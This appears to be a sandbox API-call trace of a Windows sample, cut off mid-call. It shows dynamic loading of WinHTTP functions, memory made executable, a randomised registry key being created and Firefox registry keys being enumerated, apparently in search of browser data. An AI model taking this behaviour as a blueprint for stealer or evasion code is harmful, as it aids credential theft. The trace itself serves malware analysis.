0x7fefdb7fb70 [0160.084] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76d30000 [0160.084] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfW") returned 0x76d5099c [0160.084] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x7fef7150000 [0160.087] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpen") returned 0x7fef7153428 [0160.087] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpGetProxyForUrl") returned 0x7fef715e9c0 [0160.088] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpCrackUrl") returned 0x7fef715ba38 [0160.088] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpReadData") returned 0x7fef715e1e0 [0160.088] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpAddRequestHeaders") returned 0x7fef716bdcc [0160.088] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpCloseHandle") returned 0x7fef71522e0 [0160.088] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpConnect") returned 0x7fef7163e3c [0160.088] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpSendRequest") returned 0x7fef71574d0 [0160.088] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7fef716a56c [0160.088] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpSetOption") returned 0x7fef71539c4 [0160.088] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpReceiveResponse") returned 0x7fef715d068 [0160.088] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpenRequest") returned 0x7fef71545f8 [0160.089] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x7fefe260000 [0160.089] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xc) returned 0x7fefe26d9a0 [0160.089] VirtualProtect (in: lpAddress=0x50000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x1bfb60 | out: lpflOldProtect=0x1bfb60*=0x40) returned 1 [0160.089] VirtualProtect (in: lpAddress=0x50000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1bfb60 | out: lpflOldProtect=0x1bfb60*=0x4) returned 1 [0160.091] VirtualQuery (in: lpAddress=0x60023, lpBuffer=0x1bfaf0, dwLength=0x30 | out: lpBuffer=0x1bfaf0*(BaseAddress=0x60000, AllocationBase=0x60000, AllocationProtect=0x40, __alignment1=0xfffff880, RegionSize=0x7000, State=0x1000, Protect=0x40, Type=0x40000, __alignment2=0x0)) returned 0x30 [0160.091] GetProcessHeap () returned 0x270000 [0160.091] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x364) returned 0x2a37e0 [0160.091] RtlMoveMemory (in: Destination=0x2a37e0, Source=0x60023, Length=0x363 | out: Destination=0x2a37e0) [0160.091] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x60023) returned 0x0 [0160.091] CoInitialize (pvReserved=0x0) returned 0x0 [0160.261] GetProcessHeap () returned 0x270000 [0160.261] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x104) returned 0x2ae390 [0160.262] wsprintfW (in: param_1=0x2ae390, param_2="%s\\%08x" | out: param_1="Software\\727efe68") returned 17 [0160.262] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\727efe68", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x7fe000f003f, lpSecurityAttributes=0x0, phkResult=0x1bfac8, lpdwDisposition=0x1bfac0 | out: phkResult=0x1bfac8*=0xec, lpdwDisposition=0x1bfac0*=0x1) returned 0x0 [0160.262] RegCloseKey (hKey=0xec) returned 0x0 [0160.262] VirtualQuery (in: lpAddress=0x2ae390, lpBuffer=0x1bf9f0, dwLength=0x30 | out: lpBuffer=0x1bf9f0*(BaseAddress=0x2ae000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.262] GetProcessHeap () returned 0x270000 [0160.262] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ae390 | out: hHeap=0x270000) returned 1 [0160.263] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x1bfb00 | out: ppstm=0x1bfb00*=0x2a35d0) returned 0x0 [0160.265] CMemStm::SetSize () returned 0x0 [0160.265] CMemStm::Seek () returned 0x0 [0160.265] CMemStm::Seek () returned 0x0 [0160.265] CMemStm::Write () returned 0x0 [0160.265] CMemStm::Write () returned 0x0 [0160.265] CMemStm::Write () returned 0x0 [0160.265] StrStrIW (lpFirst="Software\\Mozilla", lpSrch="Firefox") returned 0x0 [0160.267] GetProcessHeap () returned 0x270000 [0160.268] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2ae580 [0160.268] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Mozilla", phkResult=0x1bfa28 | out: phkResult=0x1bfa28*=0xec) returned 0x0 [0160.268] RegEnumKeyExW (in: hKey=0xec, dwIndex=0x0, lpName=0x2ae580, lpcchName=0x1bfa20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x1bfa20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.268] lstrlenW (lpString="Software\\Mozilla") returned 16 [0160.268] lstrlenW (lpString="\\") returned 1 [0160.268] GetProcessHeap () returned 0x270000 [0160.268] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x24) returned 0x29b8f0 [0160.268] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla" | out: lpString1="Software\\Mozilla") returned="Software\\Mozilla" [0160.268] lstrcatW (in: lpString1="Software\\Mozilla", lpString2="\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0160.268] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0160.268] lstrlenW (lpString="Firefox") returned 7 [0160.269] GetProcessHeap () returned 0x270000 [0160.269] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x32) returned 0x2a3650 [0160.269] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0160.269] lstrcatW (in: lpString1="Software\\Mozilla\\", lpString2="Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0160.269] VirtualQuery (in: lpAddress=0x29b8f0, lpBuffer=0x1bf940, dwLength=0x30 | out: lpBuffer=0x1bf940*(BaseAddress=0x29b000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x16000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.269] GetProcessHeap () returned 0x270000 [0160.269] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29b8f0 | out: hHeap=0x270000) returned 1 [0160.269] StrStrIW (lpFirst="Software\\Mozilla\\Firefox", lpSrch="Firefox") returned="Firefox" [0160.269] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20219, phkResult=0x1bf948 | out: phkResult=0x1bf948*=0xf0) returned 0x0 [0160.269] RegQueryValueExW (in: hKey=0xf0, lpValueName="PathToExe", lpReserved=0x0, lpType=0x1bf940, lpData=0x0, lpcbData=0x1bf988*=0x11 | out: lpType=0x1bf940*=0x0, lpData=0x0, lpcbData=0x1bf988*=0x0) returned 0x2 [0160.269] RegCloseKey (hKey=0xf0) returned 0x0 [0160.269] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20119, phkResult=0x1bf8e8 | out: phkResult=0x1bf8e8*=0xf0) returned 0x0 [0160.269] RegQueryValueExW (in: hKey=0xf0, lpValueName="PathToExe", lpReserved=0x0, lpType=0x1bf8e0, lpData=0x0, lpcbData=0x1bf928*=0x7 | out: lpType=0x1bf8e0*=0x0, lpData=0x0, lpcbData=0x1bf928*=0x0) returned 0x2 [0160.269] RegCloseKey (hKey=0xf0) returned 0x0 [0160.269] GetProcessHeap () returned 0x270000 [0160.269] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2af590 [0160.269] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Mozilla\\Firefox", phkResult=0x1bf9b8 | out: phkResult=0x1bf9b8*=0xf0) returned 0x0 [0160.269] RegEnumKeyExW (in: hKey=0xf0, dwIndex=0x0, lpName=0x2af590, lpcchName=0x1bf9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Crash Reporter", lpcchName=0x1bf9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.269] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0160.269] lstrlenW (lpString="\\") returned 1 [0160.269] GetProcessHeap () returned 0x270000 [0160.270] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x34) returned 0x2a3690 [0160.270] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0160.270] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox", lpString2="\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0160.270] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0160.270] lstrlenW (lpString="Crash Reporter") returned 14 [0160.270] GetProcessHeap () returned 0x270000 [0160.270] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x50) returned 0x2b05a0 [0160.270] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0160.270] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox\\", lpString2="Crash Reporter" | out: lpString1="Software\\Mozilla\\Firefox\\Crash Reporter") returned="Software\\Mozilla\\Firefox\\Crash Reporter" [0160.270] VirtualQuery (in: lpAddress=0x2a3690, lpBuffer=0x1bf8d0, dwLength=0x30 | out: lpBuffer=0x1bf8d0*(BaseAddress=0x2a3000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.270] GetProcessHeap () returned 0x270000 [0160.270] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a3690 | out: hHeap=0x270000) returned 1 [0160.270] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\Crash Reporter", lpSrch="Firefox") returned="Firefox\\Crash Reporter" [0160.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", ulOptions=0x0, samDesired=0x20219, phkResult=0x1bf8d8 | out: phkResult=0x1bf8d8*=0xf4) returned 0x0 [0160.270] RegQueryValueExW (in: hKey=0xf4, lpValueName="PathToExe", lpReserved=0x0, lpType=0x1bf8d0, lpData=0x0, lpcbData=0x1bf918*=0x19 | out: lpType=0x1bf8d0*=0x0, lpData=0x0, lpcbData=0x1bf918*=0x0) returned 0x2 [0160.270] RegCloseKey (hKey=0xf4) returned 0x0 [0160.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", ulOptions=0x0, samDesired=0x20119, phkResult=0x1bf878 | out: phkResult=0x1bf878*=0xf4) returned 0x0 [0160.270] RegQueryValueExW (in: hKey=0xf4, lpValueName="PathToExe", lpReserved=0x0, lpType=0x1bf870, lpData=0x0, lpcbData=0x1bf8b8*=0x7 | out: lpType=0x1bf870*=0x0, lpData=0x0, lpcbData=0x1bf8b8*=0x0) returned 0x2 [0160.270] RegCloseKey (hKey=0xf4) returned 0x0 [0160.271] GetProcessHeap () returned 0x270000 [0160.271] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2b0600 [0160.271] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", phkResult=0x1bf948 | out: phkResult=0x1bf948*=0xf4) returned 0x0 [0160.271] RegEnumKeyExW (in: hKey=0xf4, dwIndex=0x0, lpName=0x2b0600, lpcchName=0x1bf940, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1bf940, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.271] RegCloseKey (hKey=0xf4) returned 0x0 [0160.271] VirtualQuery (in: lpAddress=0x2b0600, lpBuffer=0x1bf890, dwLength=0x30 | out: lpBuffer=0x1bf890*(BaseAddress=0x2b0000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.271] GetProcessHeap () returned 0x270000 [0160.271] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b0600 | out: hHeap=0x270000) returned 1 [0160.271] VirtualQuery (in: lpAddress=0x2b05a0, lpBuffer=0x1bf900, dwLength=0x30 | out: lpBuffer=0x1bf900*(BaseAddress=0x2b0000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.271] GetProcessHeap () returned 0x270000 [0160.271] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b05a0 | out: hHeap=0x270000) returned 1 [0160.271] RegEnumKeyExW (in: hKey=0xf0, dwIndex=0x1, lpName=0x2af590, lpcchName=0x1bf9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x1bf9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.271] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0160.271] lstrlenW (lpString="\\") returned 1 [0160.271] GetProcessHeap () returned 0x270000 [0160.271] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x34) returned 0x2a3690 [0160.271] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0160.271] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox", lpString2="\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0160.271] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0160.271] lstrlenW (lpString="TaskBarIDs") returned 10 [0160.271] GetProcessHeap () returned 0x270000 [0160.271] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x48) returned 0x2a1d60 [0160.271] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0160.271] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox\\", lpString2="TaskBarIDs" | out: lpString1="Software\\Mozilla\\Firefox\\TaskBarIDs") returned="Software\\Mozilla\\Firefox\\TaskBarIDs" [0160.271] VirtualQuery (in: lpAddress=0x2a3690, lpBuffer=0x1bf8d0, dwLength=0x30 | out: lpBuffer=0x1bf8d0*(BaseAddress=0x2a3000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.271] GetProcessHeap () returned 0x270000 [0160.271] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a3690 | out: hHeap=0x270000) returned 1 [0160.271] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\TaskBarIDs", lpSrch="Firefox") returned="Firefox\\TaskBarIDs" [0160.271] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20219, phkResult=0x1bf8d8 | out: phkResult=0x1bf8d8*=0xf4) returned 0x0 [0160.272] RegQueryValueExW (in: hKey=0xf4, lpValueName="PathToExe", lpReserved=0x0, lpType=0x1bf8d0, lpData=0x0, lpcbData=0x1bf918*=0x19 | out: lpType=0x1bf8d0*=0x0, lpData=0x0, lpcbData=0x1bf918*=0x0) returned 0x2 [0160.272] RegCloseKey (hKey=0xf4) returned 0x0 [0160.272] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20119, phkResult=0x1bf878 | out: phkResult=0x1bf878*=0xf4) returned 0x0 [0160.272] RegQueryValueExW (in: hKey=0xf4, lpValueName="PathToExe", lpReserved=0x0, lpType=0x1bf870, lpData=0x0, lpcbData=0x1bf8b8*=0x7 | out: lpType=0x1bf870*=0x0, lpData=0x0, lpcbData=0x1bf8b8*=0x0) returned 0x2 [0160.272] RegCloseKey (hKey=0xf4) returned 0x0 [0160.272] GetProcessHeap () returned 0x270000 [0160.272] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2b05a0 [0160.272] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", phkResult=0x1bf948 | out: phkResult=0x1bf948*=0xf4) returned 0x0 [0160.272] RegEnumKeyExW (in: hKey=0xf4, dwIndex=0x0, lpName=0x2b05a0, lpcchName=0x1bf940, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1bf940, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.272] RegCloseKey (hKey=0xf4) returned 0x0 [0160.272] VirtualQuery (in: lpAddress=0x2b05a0, lpBuffer=0x1bf890, dwLength=0x30 | out: lpBuffer=0x1bf890*(BaseAddress=0x2b0000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.272] GetProcessHeap () returned 0x270000 [0160.272] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b05a0 | out: hHeap=0x270000) returned 1 [0160.272] VirtualQuery (in: lpAddress=0x2a1d60, lpBuffer=0x1bf900, dwLength=0x30 | out: lpBuffer=0x1bf900*(BaseAddress=0x2a1000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x12000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.272] GetProcessHeap () returned 0x270000 [0160.272] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1d60 | out: hHeap=0x270000) returned 1 [0160.272] RegEnumKeyExW (in: hKey=0xf0, dwIndex=0x2, lpName=0x2af590, lpcchName=0x1bf9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x1bf9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.272] RegCloseKey (hKey=0xf0) returned 0x0 [0160.272] VirtualQuery (in: lpAddress=0x2af590, lpBuffer=0x1bf900, dwLength=0x30 | out: lpBuffer=0x1bf900*(BaseAddress=0x2af000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.272] GetProcessHeap () returned 0x270000 [0160.272] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2af590 | out: hHeap=0x270000) returned 1 [0160.272] VirtualQuery (in: lpAddress=0x2a3650, lpBuffer=0x1bf970, dwLength=0x30 | out: lpBuffer=0x1bf970*(BaseAddress=0x2a3000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.272] GetProcessHeap () returned 0x270000 [0160.272] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a3650 | out: hHeap=0x270000) returned 1 [0160.272] RegEnumKeyExW (in: hKey=0xec, dwIndex=0x1, lpName=0x2ae580, lpcchName=0x1bfa20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x1bfa20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0160.273] RegCloseKey (hKey=0xec) returned 0x0 [0160.273] VirtualQuery (in: lpAddress=0x2ae580, lpBuffer=0x1bf970, dwLength=0x30 | out: lpBuffer=0x1bf970*(BaseAddress=0x2ae000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.273] GetProcessHeap () returned 0x270000 [0160.273] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ae580 | out: hHeap=0x270000) returned 1 [0160.273] StrStrIW (lpFirst="Software\\Mozilla", lpSrch="Firefox") returned 0x0 [0160.273] GetProcessHeap () returned 0x270000 [0160.273] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2ae580 [0160.273] RegOpenKeyW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla", phkResult=0x1bfa28 | out: phkResult=0x1bfa28*=0xec) returned 0x0 [0160.273] RegEnumKeyExW (in: hKey=0xec, dwIndex=0x0, lpName=0x2ae580, lpcchName=0x1bfa20, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MaintenanceService", lpcchName=0x1bfa20, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.273] lstrlenW (lpString="Software\\Mozilla") returned 16 [0160.273] lstrlenW (lpString="\\") returned 1 [0160.273] GetProcessHeap () returned 0x270000 [0160.273] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x24) returned 0x29b8f0 [0160.273] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla" | out: lpString1="Software\\Mozilla") returned="Software\\Mozilla" [0160.273] lstrcatW (in: lpString1="Software\\Mozilla", lpString2="\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0160.273] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0160.273] lstrlenW (lpString="MaintenanceService") returned 18 [0160.273] GetProcessHeap () returned 0x270000 [0160.273] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x48) returned 0x2a1d60 [0160.273] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0160.273] lstrcatW (in: lpString1="Software\\Mozilla\\", lpString2="MaintenanceService" | out: lpString1="Software\\Mozilla\\MaintenanceService") returned="Software\\Mozilla\\MaintenanceService" [0160.273] VirtualQuery (in: lpAddress=0x29b8f0, lpBuffer=0x1bf940, dwLength=0x30 | out: lpBuffer=0x1bf940*(BaseAddress=0x29b000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x18000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.273] GetProcessHeap () returned 0x270000 [0160.273] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29b8f0 | out: hHeap=0x270000) returned 1 [0160.273] StrStrIW (lpFirst="Software\\Mozilla\\MaintenanceService", lpSrch="Firefox") returned 0x0 [0160.273] GetProcessHeap () returned 0x270000 [0160.273] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2af590 [0160.273] RegOpenKeyW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla\\MaintenanceService", phkResult=0x1bf9b8 | out: phkResult=0x1bf9b8*=0xf0) returned 0x0 [0160.274] RegEnumKeyExW (in: hKey=0xf0, dwIndex=0x0, lpName=0x2af590, lpcchName=0x1bf9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="965b7fc26dad90d340d2fa0a4879039f", lpcchName=0x1bf9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.274] lstrlenW (lpString="Software\\Mozilla\\MaintenanceService") returned 35 [0160.274] lstrlenW (lpString="\\") returned 1 [0160.274] GetProcessHeap () returned 0x270000 [0160.274] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4a) returned 0x2b05a0 [0160.274] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\MaintenanceService" | out: lpString1="Software\\Mozilla\\MaintenanceService") returned="Software\\Mozilla\\MaintenanceService" [0160.274] lstrcatW (in: lpString1="Software\\Mozilla\\MaintenanceService", lpString2="\\" | out: lpString1="Software\\Mozilla\\MaintenanceService\\") returned="Software\\Mozilla\\MaintenanceService\\" [0160.274] lstrlenW (lpString="Software\\Mozilla\\MaintenanceService\\") returned 36 [0160.274] lstrlenW (lpString="965b7fc26dad90d340d2fa0a4879039f") returned 32 [0160.274] GetProcessHeap () returned 0x270000 [0160.274] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x8a) returned 0x2b0600 [0160.274] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\MaintenanceService\\" | out: lpString1="Software\\Mozilla\\MaintenanceService\\") returned="Software\\Mozilla\\MaintenanceService\\" [0160.274] lstrcatW (in: lpString1="Software\\Mozilla\\MaintenanceService\\", lpString2="965b7fc26dad90d340d2fa0a4879039f" | out: lpString1="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f") returned="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f" [0160.274] VirtualQuery (in: lpAddress=0x2b05a0, lpBuffer=0x1bf8d0, dwLength=0x30 | out: lpBuffer=0x1bf8d0*(BaseAddress=0x2b0000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.274] GetProcessHeap () returned 0x270000 [0160.274] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b05a0 | out: hHeap=0x270000) returned 1 [0160.274] StrStrIW (lpFirst="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f", lpSrch="Firefox") returned 0x0 [0160.274] GetProcessHeap () returned 0x270000 [0160.274] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1000) returned 0x2b06a0 [0160.274] RegOpenKeyW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f", phkResult=0x1bf948 | out: phkResult=0x1bf948*=0xf4) returned 0x0 [0160.274] RegEnumKeyExW (in: hKey=0xf4, dwIndex=0x0, lpName=0x2b06a0, lpcchName=0x1bf940, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="0", lpcchName=0x1bf940, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.274] lstrlenW (lpString="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f") returned 68 [0160.274] lstrlenW (lpString="\\") returned 1 [0160.274] GetProcessHeap () returned 0x270000 [0160.274] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x8c) returned 0x2b16b0 [0160.274] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f" | out: lpString1="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f") returned="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f" [0160.274] lstrcatW (in: lpString1="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f", lpString2="\\" | out: lpString1="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\") returned="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\" [0160.274] lstrlenW (lpString="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\") returned 69 [0160.274] lstrlenW (lpString="0") returned 1 [0160.274] GetProcessHeap () returned 0x270000 [0160.275] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x8e) returned 0x2b1750 [0160.275] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\" | out: lpString1="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\") returned="Software\\Mozilla\\MaintenanceService\\965b7fc26dad90d340d2fa0a4879039f\\" [0160.275] lstrcatW (in: 